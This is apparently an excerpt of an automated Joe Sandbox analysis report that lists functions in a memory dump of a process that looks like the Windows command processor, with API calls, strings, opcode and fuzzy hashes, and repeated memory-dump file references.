                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60251fb671124d7ef309f3ef71bf202c2e6a0c1a4cefa2fc5aa950af45a7b142
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6112576618B42C6EA109F10E85026BFBA0FB89764F805225EB8D03B68DF7DC048CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1532185241-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1c6a72294256c0d412322bc2bdf676a70003fefc2a48fff7776376e553141a5d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0341D432A147528BE754AB21DC6567FFAA1FF88B80F895535EB0A47785CF3CE8418710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB4FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f2ad0e1288994c78b38136c1c72dc95c389cf76207dbd40098ee7b0582e7d934
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B417B32A087428BE724AF11AC6027FF661FF94B84F985539DB0A47795DF2CE8408760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA77A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA7AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA80E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA850
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2240656346-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ebdbc91e8d620a6daac55ff06a498b509cc749ebc3b674aa33d812a43480617d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D318036A18B8186E750AF19EC6447BF6A5FF88790F985134EB4E43794DF3CD9418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE08EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memmovewcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3879766669-1994241859
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b3fb369deff4d4afefb78b93d750e48c4b9e67a4b4b225bf48054585d7624ef2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541F336F18B8A85EA65AF26EC102BBA294FF44B98F945131CE0E43784EF7CD4518390
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB4908 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$memset$FullNamePath_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 145292299-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d66686ae5a21979d7577c1d14ef1b8f5d3dd661201d77368c390b96c4363317b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ce6951b8756998e6d7503284e55a75f1bcc4e65e81974ab9d0283a6a8f96417d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d66686ae5a21979d7577c1d14ef1b8f5d3dd661201d77368c390b96c4363317b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64218232709BC289EB31AF25DDA03EAA7A0FF49788F444134CA4D4BA99EF3CD1458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED9114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 383729395-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e52f736ae07080ac365bcda8716230e3f734a8e571abd3b9f1c5d404f012c157
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3411A32190874291EA55AB14ED201BBA375FF547F4FC94331DA7D432D5EF2CE44A8350
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC04F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-2530943252
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7573600996a1f46c9666920c59a1aead382a64cbeb0534c9c6ce992817946474
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77011A25E09B02C6EA54AB11AC7113AB2A0FF55734FD40375C53E023E0EF3C65818320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-919018592
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e75eedab63912fb5927ba69ffd1c47ecd04edfe0393c67e9456e083bcfcca34d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12F01729A18B81D2EA00AB12FC5407AFA60FF89B94B889534DA4E03B58CF3CD4958B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB4F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4019809305-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a0b24318f7913c56c20ff2674c94504e948001ce6965a94f34160d5cfbbcc17f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF31B622A087828BE7906B149C6433AE791FF59B64F985238DF4D43BD5CF3CD5558710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
